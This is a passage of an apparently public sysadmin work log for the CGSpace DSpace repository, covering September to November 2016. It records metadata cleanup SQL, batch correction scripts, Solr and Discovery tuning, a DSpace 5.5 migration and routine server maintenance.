  • Generate a new list of sponsors from the database for Peter Ballantyne so we can clean them up and update the controlled vocabulary
  • +
+

2016-09-21

+
    +
  • Turns out the Solr search logic switched from OR to AND in DSpace 6.0 and the change is easy to backport: https://jira.duraspace.org/browse/DS-2809
  • +
  • We just need to set this in dspace/solr/search/conf/schema.xml:
  • +
+
<solrQueryParser defaultOperator="AND"/>
+
    +
  • It actually works really well, and search results return far fewer hits now (before, after):
  • +
+

CGSpace search with “OR” boolean logic +DSpace Test search with “AND” boolean logic

+
    +
  • Found a way to improve the configuration of Atmire’s Content and Usage Analysis (CUA) module for date fields
  • +
+
-content.analysis.dataset.option.8=metadata:dateAccessioned:discovery
++content.analysis.dataset.option.8=metadata:dc.date.accessioned:date(month)
+
    +
  • This allows the module to treat the field as a date rather than a text string, so we can interrogate it more intelligently
  • +
  • Add dc.date.accessioned to XMLUI Discovery search filters
  • +
  • Major CGSpace crash because ILRI forgot to pay the Linode bill
  • +
  • 45 minutes of downtime!
  • +
  • Start processing the fixes to dc.description.sponsorship from Peter Ballantyne:
  • +
+
$ ./fix-metadata-values.py -i sponsors-fix-23.csv -f dc.description.sponsorship -t correct -m 29 -d dspace -u dspace -p fuuu
+$ ./delete-metadata-values.py -i sponsors-delete-8.csv -f dc.description.sponsorship -m 29 -d dspace -u dspace -p fuuu
+
    +
  • I need to run these and the others from a few days ago on CGSpace the next time we run updates
  • +
  • Also, I need to update the controlled vocab for sponsors based on these
  • +
+

2016-09-22

+
    +
  • Update controlled vocabulary for sponsorship based on the latest corrected values from the database
  • +
+

2016-09-25

+
    +
  • Merge accession date improvements for CUA module (#275)
  • +
  • Merge addition of accession date to Discovery search filters (#276)
  • +
  • Merge updates to sponsorship controlled vocabulary (#277)
  • +
  • I’ve been trying to add a search filter for dc.description so the IITA people can search for some tags they use there, but for some reason the filter never shows up in Atmire’s CUA
  • +
  • Not sure if it’s something like we already have too many filters there (30), or the filter name is reserved, etc…
  • +
  • Generate a list of ILRI subjects for Peter and Abenet to look through/fix:
  • +
+
dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where resource_type_id=2 and metadata_field_id=203 group by text_value order by count desc) to /tmp/ilrisubjects.csv with csv;
+
    +
  • Regenerate Discovery indexes a few times after playing with discovery.xml index definitions (syntax, parameters, etc).
  • +
  • Merge changes to boolean logic in Solr search (#274)
  • +
  • Run all sponsorship and affiliation fixes on CGSpace, deploy latest 5_x-prod branch, and re-index Discovery on CGSpace
  • +
  • Tested OCSP stapling on DSpace Test’s nginx and it works:
  • +
+
$ openssl s_client -connect dspacetest.cgiar.org:443 -servername dspacetest.cgiar.org -tls1_2 -tlsextdebug -status
+...
+OCSP response:
+======================================
+OCSP Response Data:
+...
+    Cert Status: good
+
+

2016-09-27

+
    +
  • Discuss fixing some ORCIDs for CCAFS author Sonja Vermeulen with Magdalena Haman
  • +
  • This author has a few variations:
  • +
+
dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeu
+len, S%';
+
    +
  • And it looks like fe4b719f-6cc4-4d65-8504-7a83130b9f83 is the authority with the correct ORCID linked
  • +
+
dspacetest=# update metadatavalue set authority='fe4b719f-6cc4-4d65-8504-7a83130b9f83w', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
+UPDATE 101
+
    +
  • Hmm, now her name is missing from the authors facet and only shows the authority ID
  • +
  • On the production server there is an item with her ORCID but it is using a different authority: f01f7b7b-be3f-4df7-a61d-b73c067de88d
  • +
  • Maybe I used the wrong one… I need to look again at the production database
  • +
  • On a clean snapshot of the database I see the correct authority should be f01f7b7b-be3f-4df7-a61d-b73c067de88d, not fe4b719f-6cc4-4d65-8504-7a83130b9f83
  • +
  • Updating her authorities again and reindexing:
  • +
+
dspacetest=# update metadatavalue set authority='f01f7b7b-be3f-4df7-a61d-b73c067de88d', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
+UPDATE 101
+
    +
  • Use GitHub icon from Font Awesome instead of a PNG to save one extra network request
  • +
  • We can also replace the RSS and mail icons in community text!
  • +
  • Fix reference to dc.type.* in Atmire CUA module, as we now only index dc.type for “Output type”
  • +
+

2016-09-28

+
    +
  • Make a placeholder pull request for discovery.xml changes (#278), as I still need to test their effect on Atmire content analysis module
  • +
  • Make a placeholder pull request for Font Awesome changes (#279), which replaces the GitHub image in the footer with an icon, and add style for RSS and @ icons that I will start replacing in community/collection HTML intros
  • +
  • Had some issues with local test server after messing with Solr too much, had to blow everything away and re-install from CGSpace
  • +
  • Going to try to update Sonja Vermeulen’s authority to 2b4166b7-6e4d-4f66-9d8b-ddfbec9a6ae0, as that seems to be one of her authorities that has an ORCID
  • +
  • Merge Font Awesome changes (#279)
  • +
  • Minor fix to a string in Atmire’s CUA module (#280)
  • +
  • This seems to be what I’ll need to do for Sonja Vermeulen (but with 2b4166b7-6e4d-4f66-9d8b-ddfbec9a6ae0 instead on the live site):
  • +
+
dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
+dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen SJ%';
+
    +
  • And then update Discovery and Authority indexes
  • +
  • Minor fix for “Subject” string in Discovery search and Atmire modules (#281)
  • +
  • Start testing batch fixes for ILRI subject from Peter:
  • +
+
$ ./fix-metadata-values.py -i ilrisubjects-fix-32.csv -f cg.subject.ilri -t correct -m 203 -d dspace -u dspace -p fuuuu
+$ ./delete-metadata-values.py -i ilrisubjects-delete-13.csv -f cg.subject.ilri -m 203 -d dspace -u dspace -p fuuu
+

2016-09-29

+
    +
  • Add cg.identifier.ciatproject to metadata registry in preparation for CIAT project tag
  • +
  • Merge changes for CIAT project tag (#282)
  • +
  • DSpace Test (linode02) became unresponsive for some reason, I had to hard reboot it from the Linode console
  • +
  • People on DSpace mailing list gave me a query to get authors from certain collections:
  • +
+
dspacetest=# select distinct text_value from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/5472', '10568/5473')));
+

2016-09-30

+
    +
  • Deny access to REST API’s find-by-metadata-field endpoint to protect against an upstream security issue (DS-3250)
  • +
  • There is a patch but it is only for 5.5 and doesn’t apply cleanly to 5.1
  • +
diff --git a/docs/2016-10/index.html b/docs/2016-10/index.html
new file mode 100644
index 000000000..a9c9ea2c9
--- /dev/null
+++ b/docs/2016-10/index.html
@@ -0,0 +1,426 @@

October, 2016

+ +
+

2016-10-03

+
    +
  • Testing adding ORCIDs to a CSV file for a single item to see if the author orders get messed up
  • +
  • Need to test the following scenarios to see how author order is affected: +
      +
    • ORCIDs only
    • +
    • ORCIDs plus normal authors
    • +
    +
  • +
  • I exported a random item’s metadata as CSV, deleted all columns except id and collection, and made a new column called ORCID:dc.contributor.author with the following random ORCIDs from the ORCID registry (see the CSV sketch below):
  • +
+
0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
+
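  • A sketch of building that test CSV with Python (the item id and collection handle here are made up):

#!/usr/bin/env python3
# Sketch: build a one-item CSV for DSpace batch metadata editing with an
# ORCID:dc.contributor.author column. The id and collection values are made
# up; multiple values use the usual || separator.
import csv

with open("/tmp/orcid-test.csv", "w", newline="") as f:
    writer = csv.writer(f)
    writer.writerow(["id", "collection", "ORCID:dc.contributor.author"])
    writer.writerow([
        "12345",       # hypothetical item ID
        "10568/4003",  # hypothetical collection handle
        "0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X",
    ])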
    +
  • Hmm, with the dc.contributor.author column removed, DSpace doesn’t detect any changes
  • +
  • With a blank dc.contributor.author column, DSpace wants to remove all non-ORCID authors and add the new ORCID authors
  • +
  • I added the disclaimer text to the About page, then added a footer link to the disclaimer’s ID, but there is a Bootstrap issue that causes the page content to disappear when using in-page anchors: https://github.com/twbs/bootstrap/issues/1768
  • +
+

Bootstrap issue with in-page anchors

+
    +
  • Looks like we’ll just have to add the text to the About page (without a link) or add a separate page
  • +
+

2016-10-04

+
    +
  • Start testing cleanups of authors that Peter sent last week
  • +
  • Out of 40,000+ rows, Peter had indicated corrections for ~3,200 of them, which was too many to look through carefully, so I did some basic quality checking (see the sketch after the commands below): +
      +
    • Trim leading/trailing whitespace
    • +
    • Find invalid characters
    • +
    • Cluster values to merge obvious authors
    • +
    +
  • +
  • That left us with 3,180 valid corrections and 3 deletions:
  • +
+
$ ./fix-metadata-values.py -i authors-fix-3180.csv -f dc.contributor.author -t correct -m 3 -d dspacetest -u dspacetest -p fuuu
+$ ./delete-metadata-values.py -i authors-delete-3.csv -f dc.contributor.author -m 3 -d dspacetest -u dspacetest -p fuuu
+
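  • For reference, those basic checks could look something like this sketch (the "correct" column name is an assumption matching the -t correct flag above):

#!/usr/bin/env python3
# Sketch: sanity-check a corrections CSV before running fix-metadata-values.py:
# flag values with leading/trailing whitespace or control/format characters.
# The column name "correct" is an assumption based on the -t correct flag.
import csv
import unicodedata

with open("authors-fix-3180.csv", newline="") as f:
    for row in csv.DictReader(f):
        value = row["correct"]
        if value != value.strip():
            print("whitespace: {!r}".format(value))
        if any(unicodedata.category(c).startswith("C") for c in value):
            print("invalid character: {!r}".format(value))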
    +
  • Remove old about page (#284)
  • +
  • CGSpace crashed a few times today
  • +
  • Generate list of unique authors in CCAFS collections:
  • +
+
dspacetest=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/32729', '10568/5472', '10568/5473', '10568/10288', '10568/70974', '10568/3547', '10568/3549', '10568/3531','10568/16890','10568/5470','10568/3546', '10568/36024', '10568/66581', '10568/21789', '10568/5469', '10568/5468', '10568/3548', '10568/71053', '10568/25167'))) group by text_value order by count desc) to /tmp/ccafs-authors.csv with csv;
+

2016-10-05

+
    +
  • Work on more infrastructure cleanups for Ansible DSpace role
  • +
  • Clean up Let’s Encrypt plumbing and submit pull request for rmg-ansible-public (#60)
  • +
+

2016-10-06

+
    +
  • Nice! DSpace Test (linode02) is now having java.lang.OutOfMemoryError: Java heap space errors…
  • +
  • Heap space is 2048m, and we have 5GB of RAM being used for OS cache (Solr!) so let’s just bump the memory to 3072m
  • +
  • Magdalena from CCAFS asked why the colors in the thumbnails for these two items look different, even though they are the same in the PDF itself
  • +
+

CMYK vs sRGB colors

+
    +
  • Turns out the first PDF was exported from InDesign using CMYK and the second one was using sRGB
  • +
  • Run all system updates on DSpace Test and reboot it
  • +
+

2016-10-08

+
    +
  • Re-deploy CGSpace with latest changes from late September and early October
  • +
  • Run fixes for ILRI subjects and delete blank metadata values:
  • +
+
dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
+DELETE 11
+
    +
  • Run all system updates and reboot CGSpace
  • +
  • Delete ten gigs of old 2015 Tomcat logs that never got rotated (WTF?):
  • +
+
root@linode01:~# ls -lh /var/log/tomcat7/localhost_access_log.2015* | wc -l
+47
+
    +
  • Delete 2GB cron-filter-media.log file, as it is just a log from a cron job and it doesn’t get rotated like normal log files (almost a year now maybe)
  • +
+

2016-10-14

+
    +
  • Run all system updates on DSpace Test and reboot server
  • +
  • Looking into some issues with Discovery filters in Atmire’s content and usage analysis module after adjusting the filter class
  • +
  • Looks like changing the filters from configuration.DiscoverySearchFilterFacet to configuration.DiscoverySearchFilter breaks them in Atmire CUA module
  • +
+

2016-10-17

+
    +
  • A bit more cleanup on the CCAFS authors, and run the corrections on DSpace Test:
  • +
+
$ ./fix-metadata-values.py -i ccafs-authors-oct-16.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
+
    +
  • One observation is that there are still some old versions of names in the author lookup because authors appear in other communities (as we only corrected authors from CCAFS for this round)
  • +
+

2016-10-18

+
    +
  • Start working on DSpace 5.5 porting work again:
  • +
+
$ git checkout -b 5_x-55 5_x-prod
+$ git rebase -i dspace-5.5
+
    +
  • Have to fix about ten merge conflicts, mostly in the SCSS for the CGIAR theme
  • +
  • Skip 1e34751b8cf17021f45d4cf2b9a5800c93fb4cb2 in favor of upstream’s 55e623d1c2b8b7b1fa45db6728e172e06bfa8598 (which fixes the X-Forwarded-For header) because I had made the same fix myself and it’s better to use the upstream one
  • +
  • I notice this rebase gets rid of GitHub merge commits… which actually might be fine because merges are fucking annoying to deal with when remote people merge without pulling and rebasing their branch first
  • +
  • Finished up applying the 5.5 sitemap changes to all themes
  • +
  • Merge the discovery.xml cleanups (#278)
  • +
  • Merge some minor edits to the distribution license (#285)
  • +
+

2016-10-19

+
    +
  • When we move to DSpace 5.5 we should also cherry pick some patches from 5.6 branch: +
      +
    • memory cleanup: 9f0f5940e7921765c6a22e85337331656b18a403
    • +
    • sql injection: c6fda557f731dbc200d7d58b8b61563f86fe6d06
    • +
    • pdfbox security issue: b5330b78153b2052ed3dc2fd65917ccdbfcc0439
    • +
    +
  • +
+

2016-10-20

+
    +
  • Run CCAFS author corrections on CGSpace
  • +
  • Discovery reindexing took forever and kinda caused CGSpace to crash, so I ran all system updates and rebooted the server
  • +
+

2016-10-25

+
    +
  • Move the LIVES community from the top level to the ILRI projects community
  • +
+
$ /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child=10568/25101
+
    +
  • Start testing some things for DSpace 5.5, like command line metadata import, PDF media filter, and Atmire CUA
  • +
  • Start looking at batch fixing of “old” ILRI website links without www or https, for example:
  • +
+
dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ilri.org%';
+
    +
  • Also CCAFS has HTTPS and their links should use it where possible:
  • +
+
dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ccafs.cgiar.org%';
+
    +
  • And this will find community and collection HTML text that is using the old style PNG/JPG icons for RSS and email (we should be using Font Awesome icons instead):
  • +
+
dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like '%Iconrss2.png%';
+
    +
  • Turns out there are shit tons of varieties of this, like with http, https, www, separate </img> tags, alignments, etc
  • +
  • Had to find all variations and replace them individually (a small generator sketch follows the statements below):
  • +
+
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/Iconrss2.png"/>','<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/Iconrss2.png"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/email.jpg"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/Iconrss2.png"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/email.jpg"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/Iconrss2.png"></img>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/email.jpg"></img>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/Iconrss2.png"></img>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/email.jpg"></img>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/Iconrss2.png"></img>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/email.jpg"></img>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/Iconrss2.png"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/email.jpg"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="https://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="https://www.ilri.org/images/Iconrss2.png"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="https://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="https://www.ilri.org/images/email.jpg"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/>%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="http://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="http://www.ilri.org/images/email.jpg"/>%';
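  • Rather than typing every variation out by hand, a small generator like this sketch could print the statements from the combinations above (the output should still be reviewed before running it):

#!/usr/bin/env python3
# Sketch: generate the icon-replacement UPDATE statements above from the
# combinations of image, tag style, and host, instead of writing each one by
# hand. Review the output before running it against the database.
from itertools import product

icons = {
    "Iconrss2.png": '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>',
    "email.jpg": '<span class="fa fa-at fa-2x" aria-hidden="true"></span>',
}
prefixes = ['<img align="left" src="', '<img valign="center" align="left" src="']
hosts = ["http://www.ilri.org", "https://www.ilri.org", "http://ilri.org", "https://ilri.org"]
suffixes = ['"/>', '"></img>']

for (image, span), prefix, host, suffix in product(icons.items(), prefixes, hosts, suffixes):
    old = "{}{}/images/{}{}".format(prefix, host, image, suffix)
    print(
        "update metadatavalue set text_value = regexp_replace(text_value, '{}', '{}') "
        "where resource_type_id in (3,4) and text_value like '%{}%';".format(old, span, old)
    )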
+
    +
  • Getting rid of these reduces the number of network requests each client makes on community/collection pages, and makes use of Font Awesome icons (which they are already loading anyways!)
  • +
  • And now that I start looking, I want to fix a bunch of links to popular sites that should be using HTTPS, like Twitter, Facebook, Google, Feed Burner, DOI, etc
  • +
  • I should look to see if any of those domains sends an HTTP 301 redirect or sets HSTS headers for their HTTPS domains, then just replace them (see the sketch below)
  • +
+
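  • A quick sketch of such a check with Python requests (the domain list is just an example):

#!/usr/bin/env python3
# Sketch: check whether a domain's plain-HTTP site redirects with a 301 and
# whether its HTTPS site sets a Strict-Transport-Security (HSTS) header.
# The domain list is just an example.
import requests

domains = ["twitter.com", "www.facebook.com", "dx.doi.org", "feeds.feedburner.com"]

for domain in domains:
    http = requests.get("http://{}/".format(domain), allow_redirects=False, timeout=10)
    https = requests.get("https://{}/".format(domain), timeout=10)
    redirects = http.status_code == 301 and http.headers.get("Location", "").startswith("https://")
    hsts = "Strict-Transport-Security" in https.headers
    print("{}: 301-to-https={} hsts={}".format(domain, redirects, hsts))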

2016-10-27

+
    +
  • Run Font Awesome fixes on DSpace Test:
  • +
+
dspace=# \i /tmp/font-awesome-text-replace.sql
+UPDATE 17
+UPDATE 17
+UPDATE 3
+UPDATE 3
+UPDATE 30
+UPDATE 30
+UPDATE 1
+UPDATE 1
+UPDATE 7
+UPDATE 7
+UPDATE 1
+UPDATE 1
+UPDATE 1
+UPDATE 1
+UPDATE 1
+UPDATE 1
+UPDATE 0
+
    +
  • Looks much better now:
  • +
+

CGSpace with old icons +DSpace Test with Font Awesome icons

+
    +
  • Run the same replacements on CGSpace
  • +
+

2016-10-30

+
    +
  • Fix some messed up authors on CGSpace:
  • +
+
dspace=# update metadatavalue set authority='799da1d8-22f3-43f5-8233-3d2ef5ebf8a8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Charleston, B.%';
+UPDATE 10
+dspace=# update metadatavalue set authority='e936f5c5-343d-4c46-aa91-7a1fff6277ed', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Knight-Jones%';
+UPDATE 36
+
    +
  • I updated the authority index but nothing seemed to change, so I’ll wait and do it again after I update Discovery below
  • +
  • Skype chat with Tsega about the IFPRI contentdm bridge
  • +
  • We tested harvesting OAI in an example collection to see how it works
  • +
  • Talk to Carlos Quiros about CG Core metadata in CGSpace
  • +
  • Get a list of countries from CGSpace so I can do some batch corrections:
  • +
+
dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id=228 group by text_value order by count desc) to /tmp/countries.csv with csv;
+
    +
  • Fix a bunch of countries in Open Refine and run the corrections on CGSpace:
  • +
+
$ ./fix-metadata-values.py -i countries-fix-18.csv -f dc.coverage.country -t 'correct' -m 228 -d dspace -u dspace -p fuuu
+$ ./delete-metadata-values.py -i countries-delete-2.csv -f dc.coverage.country -m 228 -d dspace -u dspace -p fuuu
+
    +
  • Run a shit ton of author fixes from Peter Ballantyne that we’ve been cleaning up for two months:
  • +
+
$ ./fix-metadata-values.py -i /tmp/authors-fix-pb2.csv -f dc.contributor.author -t correct -m 3 -u dspace -d dspace -p fuuu
+
    +
  • Run a few URL corrections for ilri.org and doi.org, etc:
  • +
+
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://www.ilri.org','https://www.ilri.org') where resource_type_id=2 and text_value like '%http://www.ilri.org%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://mahider.ilri.org', 'https://cgspace.cgiar.org') where resource_type_id=2 and text_value like '%http://mahider.%.org%' and metadata_field_id not in (28);
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://dx.doi.org%' and metadata_field_id not in (18,26,28,111);
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://doi.org%' and metadata_field_id not in (18,26,28,111);
+
    +
  • I skipped metadata fields like citation and description
  • +
diff --git a/docs/2016-11/index.html b/docs/2016-11/index.html
new file mode 100644
index 000000000..cac44555c
--- /dev/null
+++ b/docs/2016-11/index.html
@@ -0,0 +1,602 @@

November, 2016

+ +
+

2016-11-01

+
    +
  • Add dc.type to the output options for Atmire’s Listings and Reports module (#286)
  • +
+

Listings and Reports with output type

+

2016-11-02

+
    +
  • Migrate DSpace Test to DSpace 5.5 (notes)
  • +
  • Run all updates on DSpace Test and reboot the server
  • +
  • Looks like the OAI bug from DSpace 5.1 that caused validation at Base Search to fail is now fixed and DSpace Test passes validation! (#63)
  • +
  • Indexing Discovery on DSpace Test took 332 minutes, which is like five times as long as it usually takes
  • +
  • At the end it appeared to finish correctly but there were lots of errors right after it finished:
  • +
+
2016-11-02 15:09:48,578 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Wrote Collection: 10568/76454 to Index
+2016-11-02 15:09:48,584 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Wrote Community: 10568/3202 to Index
+2016-11-02 15:09:48,589 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Wrote Collection: 10568/76455 to Index
+2016-11-02 15:09:48,590 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Wrote Community: 10568/51693 to Index
+2016-11-02 15:09:48,590 INFO  org.dspace.discovery.IndexClient @ Done with indexing
+2016-11-02 15:09:48,600 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Wrote Collection: 10568/76456 to Index
+2016-11-02 15:09:48,613 INFO  org.dspace.discovery.SolrServiceImpl @ Wrote Item: 10568/55536 to Index
+2016-11-02 15:09:48,616 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Wrote Collection: 10568/76457 to Index
+2016-11-02 15:09:48,634 ERROR com.atmire.dspace.discovery.AtmireSolrService @
+java.lang.NullPointerException
+        at org.dspace.discovery.SearchUtils.getDiscoveryConfiguration(SourceFile:57)
+        at org.dspace.discovery.SolrServiceImpl.buildDocument(SolrServiceImpl.java:824)
+        at com.atmire.dspace.discovery.AtmireSolrService.indexContent(AtmireSolrService.java:821)
+        at com.atmire.dspace.discovery.AtmireSolrService.updateIndex(AtmireSolrService.java:898)
+        at org.dspace.discovery.SolrServiceImpl.createIndex(SolrServiceImpl.java:370)
+        at org.dspace.storage.rdbms.DatabaseUtils$ReindexerThread.run(DatabaseUtils.java:945)
+
    +
  • DSpace is still up, and a few minutes later I see the default DSpace indexer is still running
  • +
  • Sure enough, looking back before the first one finished, I see output from both indexers interleaved in the log:
  • +
+
2016-11-02 15:09:28,545 INFO  org.dspace.discovery.SolrServiceImpl @ Wrote Item: 10568/47242 to Index
+2016-11-02 15:09:28,633 INFO  org.dspace.discovery.SolrServiceImpl @ Wrote Item: 10568/60785 to Index
+2016-11-02 15:09:28,678 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Processing (55695 of 55722): 43557
+2016-11-02 15:09:28,688 INFO  com.atmire.dspace.discovery.AtmireSolrService @ Processing (55703 of 55722): 34476
+
    +
  • I will raise a ticket with Atmire to ask them
  • +
+

2016-11-06

+
    +
  • After re-deploying and re-indexing I didn’t see the same issue, and the indexing completed in 85 minutes, which is about how long it is supposed to take
  • +
+

2016-11-07

+
    +
  • Horrible one liner to get Linode ID from certain Ansible host vars:
  • +
+
$ grep -A 3 contact_info * | grep -E "(Orth|Sisay|Peter|Daniel|Tsega)" | awk -F'-' '{print $1}' | grep linode | uniq | xargs grep linode_id
+
    +
  • I noticed some weird CRPs in the database, and they don’t show up in Discovery for some reason, perhaps the :
  • +
  • I’ll export these and fix them in batch:
  • +
+
dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id=230 group by text_value order by count desc) to /tmp/crp.csv with csv;
+COPY 22
+
    +
  • Test running the replacements:
  • +
+
$ ./fix-metadata-values.py -i /tmp/CRPs.csv -f cg.contributor.crp -t correct -m 230 -d dspace -u dspace -p 'fuuu'
+
    +
  • Add AMR to ILRI subjects and remove one duplicate instance of IITA in author affiliations controlled vocabulary (#288)
  • +
+

2016-11-08

+
    +
  • Atmire’s Listings and Reports module seems to be broken on DSpace 5.5
  • +
+

Listings and Reports broken in DSpace 5.5

+
    +
  • I’ve filed a ticket with Atmire
  • +
  • Thinking about batch updates for ORCIDs and authors
  • +
  • Playing with SolrClient in Python to query Solr
  • +
  • All records in the authority core are either authority_type:orcid or authority_type:person
  • +
  • There is a deleted field and all items seem to be false, but might be important sanity check to remember
  • +
  • The way to go is probably to have a CSV of author names and authority IDs, then to batch update them in PostgreSQL (see the sketch below)
  • +
  • Dump of the top ~200 authors in CGSpace:
  • +
+
dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id=3 group by text_value order by count desc limit 210) to /tmp/210-authors.csv with csv;
+
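  • A sketch of that CSV-driven batch update with psycopg2 (the CSV layout, file name, and connection details are assumptions):

#!/usr/bin/env python3
# Sketch: read a CSV of author name / authority UUID pairs and batch update
# metadatavalue, like the manual UPDATEs from earlier this year. The CSV
# layout, file name, and connection parameters are assumptions.
import csv

import psycopg2

conn = psycopg2.connect("dbname=dspacetest user=dspacetest password=fuuu host=localhost")

with conn, conn.cursor() as cursor, open("/tmp/authors-authorities.csv", newline="") as f:
    for row in csv.DictReader(f):  # expects columns: text_value, authority
        cursor.execute(
            "update metadatavalue set authority=%s, confidence=600 "
            "where metadata_field_id=3 and resource_type_id=2 and text_value=%s",
            (row["authority"], row["text_value"]),
        )
        print("{}: {} rows".format(row["text_value"], cursor.rowcount))

conn.close()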

2016-11-09

+
    +
  • CGSpace crashed so I quickly ran system updates, applied one or two of the waiting changes from the 5_x-prod branch, and rebooted the server
  • +
  • The error was Timeout waiting for idle object but I haven’t looked into the Tomcat logs to see what happened
  • +
